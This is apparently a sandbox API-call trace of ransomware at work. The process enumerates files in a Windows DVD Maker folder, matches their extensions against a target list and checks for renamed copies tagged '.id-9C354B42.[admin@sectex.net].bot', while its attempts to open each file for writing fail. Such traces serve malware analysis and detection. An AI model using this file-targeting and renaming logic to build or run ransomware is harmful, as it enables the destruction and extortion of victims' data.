	[0138.768] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0138.768] lstrlenW (lpString=".dbf") returned 4
	[0138.768] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0138.768] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0138.768] lstrlenW (lpString=".1cd") returned 4
	[0138.768] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0138.768] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72
	[0138.768] lstrlenW (lpString=".jpg") returned 4
	[0138.768] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0138.768] lstrcmpiW (lpString1=".wmv", lpString2=".bot") returned 1
	[0138.768] lstrlenW (lpString="Bear_Formatted_MATTE2_PAL.wmv") returned 29
	[0138.768] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0138.800] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=181322) returned 1
	[0138.800] CloseHandle (hObject=0x388) returned 1
	[0138.801] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2_pal.wmv")) returned 0x20
	[0138.801] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.801] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.801] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv") returned 82
	[0138.802] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv") returned 82
	[0138.802] lstrlenW (lpString=".doc") returned 4
	[0138.802] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0138.802] lstrlenW (lpString=".docx") returned 5
	[0138.802] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1
	[0138.802] lstrlenW (lpString=".pdf") returned 4
	[0138.802] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0138.802] lstrlenW (lpString=".xls") returned 4
	[0138.802] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0138.802] lstrlenW (lpString=".xlsx") returned 5
	[0138.802] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1
	[0138.802] lstrlenW (lpString=".ppt") returned 4
	[0138.802] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0138.802] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv") returned 82
	[0138.802] lstrlenW (lpString=".zip") returned 4
	[0138.802] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0138.802] lstrlenW (lpString=".rar") returned 4
	[0138.802] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0138.802] lstrlenW (lpString=".bz2") returned 4
	[0138.802] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0138.802] lstrlenW (lpString=".7z") returned 3
	[0138.802] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0138.802] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv") returned 82
	[0138.802] lstrlenW (lpString=".dbf") returned 4
	[0138.802] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0138.802] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv") returned 82
	[0138.802] lstrlenW (lpString=".1cd") returned 4
	[0138.802] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0138.802] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv") returned 82
	[0138.802] lstrlenW (lpString=".jpg") returned 4
	[0138.802] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0138.802] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv") returned 82
	[0138.803] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv") returned 82
	[0138.803] lstrlenW (lpString=".doc") returned 4
	[0138.803] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0138.803] lstrlenW (lpString=".docx") returned 5
	[0138.803] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1
	[0138.803] lstrlenW (lpString=".pdf") returned 4
	[0138.803] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0138.803] lstrlenW (lpString=".xls") returned 4
	[0138.803] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0138.803] lstrlenW (lpString=".xlsx") returned 5
	[0138.803] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1
	[0138.803] lstrlenW (lpString=".ppt") returned 4
	[0138.803] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0138.803] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv") returned 82
	[0138.803] lstrlenW (lpString=".zip") returned 4
	[0138.803] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0138.803] lstrlenW (lpString=".rar") returned 4
	[0138.803] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0138.803] lstrlenW (lpString=".bz2") returned 4
	[0138.803] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0138.803] lstrlenW (lpString=".7z") returned 3
	[0138.803] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0138.803] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv") returned 82
	[0138.803] lstrlenW (lpString=".dbf") returned 4
	[0138.803] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0138.803] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv") returned 82
	[0138.803] lstrlenW (lpString=".1cd") returned 4
	[0138.803] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0138.803] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv") returned 82
	[0138.803] lstrlenW (lpString=".jpg") returned 4
	[0138.803] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0138.804] lstrcmpiW (lpString1=".wmv", lpString2=".bot") returned 1
	[0138.804] lstrlenW (lpString="Bear_Formatted_RGB6_PAL.wmv") returned 27
	[0138.804] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0138.804] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=269322) returned 1
	[0138.804] CloseHandle (hObject=0x38c) returned 1
	[0138.804] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6_pal.wmv")) returned 0x20
	[0138.804] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.804] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.804] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv") returned 80
	[0138.804] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv") returned 80
	[0138.804] lstrlenW (lpString=".doc") returned 4
	[0138.805] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0138.805] lstrlenW (lpString=".docx") returned 5
	[0138.805] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1
	[0138.805] lstrlenW (lpString=".pdf") returned 4
	[0138.805] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0138.805] lstrlenW (lpString=".xls") returned 4
	[0138.805] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0138.805] lstrlenW (lpString=".xlsx") returned 5
	[0138.805] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1
	[0138.805] lstrlenW (lpString=".ppt") returned 4
	[0138.805] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0138.805] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv") returned 80
	[0138.805] lstrlenW (lpString=".zip") returned 4
	[0138.805] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0138.805] lstrlenW (lpString=".rar") returned 4
	[0138.805] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0138.805] lstrlenW (lpString=".bz2") returned 4
	[0138.805] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0138.805] lstrlenW (lpString=".7z") returned 3
	[0138.805] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0138.805] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv") returned 80
	[0138.805] lstrlenW (lpString=".dbf") returned 4
	[0138.805] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0138.805] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv") returned 80
	[0138.805] lstrlenW (lpString=".1cd") returned 4
	[0138.805] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0138.805] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv") returned 80
	[0138.805] lstrlenW (lpString=".jpg") returned 4
	[0138.805] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0138.805] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv") returned 80
	[0138.805] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv") returned 80
	[0138.805] lstrlenW (lpString=".doc") returned 4
	[0138.806] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0138.806] lstrlenW (lpString=".docx") returned 5
	[0138.806] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1
	[0138.806] lstrlenW (lpString=".pdf") returned 4
	[0138.806] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0138.806] lstrlenW (lpString=".xls") returned 4
	[0138.806] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0138.806] lstrlenW (lpString=".xlsx") returned 5
	[0138.806] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1
	[0138.806] lstrlenW (lpString=".ppt") returned 4
	[0138.806] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0138.806] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv") returned 80
	[0138.806] lstrlenW (lpString=".zip") returned 4
	[0138.806] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0138.806] lstrlenW (lpString=".rar") returned 4
	[0138.806] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0138.806] lstrlenW (lpString=".bz2") returned 4
	[0138.806] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0138.806] lstrlenW (lpString=".7z") returned 3
	[0138.806] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0138.806] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv") returned 80
	[0138.806] lstrlenW (lpString=".dbf") returned 4
	[0138.806] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0138.806] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv") returned 80
	[0138.806] lstrlenW (lpString=".1cd") returned 4
	[0138.806] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0138.806] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv") returned 80
	[0138.806] lstrlenW (lpString=".jpg") returned 4
	[0138.806] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0138.807] lstrcmpiW (lpString1=".png", lpString2=".bot") returned 1
	[0138.807] lstrlenW (lpString="btn-back-static.png") returned 19
	[0138.807] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-back-static.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390
	[0138.900] GetFileSizeEx (in: hFile=0x390, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=3525) returned 1
	[0138.900] CloseHandle (hObject=0x390) returned 1
	[0138.903] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-back-static.png")) returned 0x20
	[0138.903] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-back-static.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.903] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.904] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png") returned 72
	[0138.904] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png") returned 72
	[0138.904] lstrlenW (lpString=".doc") returned 4
	[0138.904] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0138.904] lstrlenW (lpString=".docx") returned 5
	[0138.904] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1
	[0138.904] lstrlenW (lpString=".pdf") returned 4
	[0138.904] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0138.904] lstrlenW (lpString=".xls") returned 4
	[0138.904] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0138.904] lstrlenW (lpString=".xlsx") returned 5
	[0138.904] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1
	[0138.904] lstrlenW (lpString=".ppt") returned 4
	[0138.904] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0138.904] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png") returned 72
	[0138.904] lstrlenW (lpString=".zip") returned 4
	[0138.904] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0138.904] lstrlenW (lpString=".rar") returned 4
	[0138.904] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0138.904] lstrlenW (lpString=".bz2") returned 4
	[0138.904] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0138.904] lstrlenW (lpString=".7z") returned 3
	[0138.904] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0138.904] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png") returned 72
	[0138.904] lstrlenW (lpString=".dbf") returned 4
	[0138.904] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0138.904] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png") returned 72
	[0138.904] lstrlenW (lpString=".1cd") returned 4
	[0138.904] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0138.904] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png") returned 72
	[0138.904] lstrlenW (lpString=".jpg") returned 4
	[0138.904] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0138.905] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png") returned 72
	[0138.905] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png") returned 72
	[0138.905] lstrlenW (lpString=".doc") returned 4
	[0138.905] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0138.905] lstrlenW (lpString=".docx") returned 5
	[0138.905] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1
	[0138.905] lstrlenW (lpString=".pdf") returned 4
	[0138.905] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0138.905] lstrlenW (lpString=".xls") returned 4
	[0138.905] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0138.905] lstrlenW (lpString=".xlsx") returned 5
	[0138.905] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1
	[0138.905] lstrlenW (lpString=".ppt") returned 4
	[0138.905] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0138.905] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png") returned 72
	[0138.905] lstrlenW (lpString=".zip") returned 4
	[0138.905] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0138.905] lstrlenW (lpString=".rar") returned 4
	[0138.905] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0138.905] lstrlenW (lpString=".bz2") returned 4
	[0138.905] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0138.905] lstrlenW (lpString=".7z") returned 3
	[0138.905] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0138.905] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png") returned 72
	[0138.905] lstrlenW (lpString=".dbf") returned 4
	[0138.905] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0138.905] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png") returned 72
	[0138.905] lstrlenW (lpString=".1cd") returned 4
	[0138.905] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0138.905] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png") returned 72
	[0138.905] lstrlenW (lpString=".jpg") returned 4
	[0138.905] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0138.906] lstrcmpiW (lpString1=".png", lpString2=".bot") returned 1
	[0138.906] lstrlenW (lpString="colorcycle.png") returned 14
	[0138.906] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\colorcycle.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0138.917] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=17378) returned 1
	[0138.917] CloseHandle (hObject=0x38c) returned 1
	[0138.917] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\colorcycle.png")) returned 0x20
	[0138.922] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\colorcycle.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.922] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\colorcycle.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.922] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png") returned 67
	[0138.922] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png") returned 67
	[0138.922] lstrlenW (lpString=".doc") returned 4
	[0138.922] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0138.922] lstrlenW (lpString=".docx") returned 5
	[0138.922] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1
	[0138.922] lstrlenW (lpString=".pdf") returned 4
	[0138.922] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0138.922] lstrlenW (lpString=".xls") returned 4
	[0138.922] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0138.923] lstrlenW (lpString=".xlsx") returned 5
	[0138.923] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1
	[0138.923] lstrlenW (lpString=".ppt") returned 4
	[0138.923] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0138.923] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png") returned 67
	[0138.923] lstrlenW (lpString=".zip") returned 4
	[0138.923] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0138.923] lstrlenW (lpString=".rar") returned 4
	[0138.923] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0138.923] lstrlenW (lpString=".bz2") returned 4
	[0138.923] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0138.923] lstrlenW (lpString=".7z") returned 3
	[0138.923] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0138.923] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png") returned 67
	[0138.923] lstrlenW (lpString=".dbf") returned 4
	[0138.923] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0138.923] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png") returned 67
	[0138.923] lstrlenW (lpString=".1cd") returned 4
	[0138.923] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0138.923] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png") returned 67
	[0138.923] lstrlenW (lpString=".jpg") returned 4
	[0138.923] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0138.923] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png") returned 67
	[0138.923] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png") returned 67
	[0138.923] lstrlenW (lpString=".doc") returned 4
	[0138.923] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0138.923] lstrlenW (lpString=".docx") returned 5
	[0138.923] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1
	[0138.923] lstrlenW (lpString=".pdf") returned 4
	[0138.923] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0138.923] lstrlenW (lpString=".xls") returned 4
	[0138.923] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0138.923] lstrlenW (lpString=".xlsx") returned 5
	[0138.923] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1
	[0138.924] lstrlenW (lpString=".ppt") returned 4
	[0138.924] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0138.924] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png") returned 67
	[0138.924] lstrlenW (lpString=".zip") returned 4
	[0138.924] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0138.924] lstrlenW (lpString=".rar") returned 4
	[0138.924] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0138.924] lstrlenW (lpString=".bz2") returned 4
	[0138.924] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0138.924] lstrlenW (lpString=".7z") returned 3
	[0138.924] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0138.924] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png") returned 67
	[0138.924] lstrlenW (lpString=".dbf") returned 4
	[0138.924] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0138.924] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png") returned 67
	[0138.924] lstrlenW (lpString=".1cd") returned 4
	[0138.924] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0138.924] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png") returned 67
	[0138.924] lstrlenW (lpString=".jpg") returned 4
	[0138.924] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0138.924] lstrcmpiW (lpString1=".png", lpString2=".bot") returned 1
	[0138.924] lstrlenW (lpString="huemainsubpicture2.png") returned 22
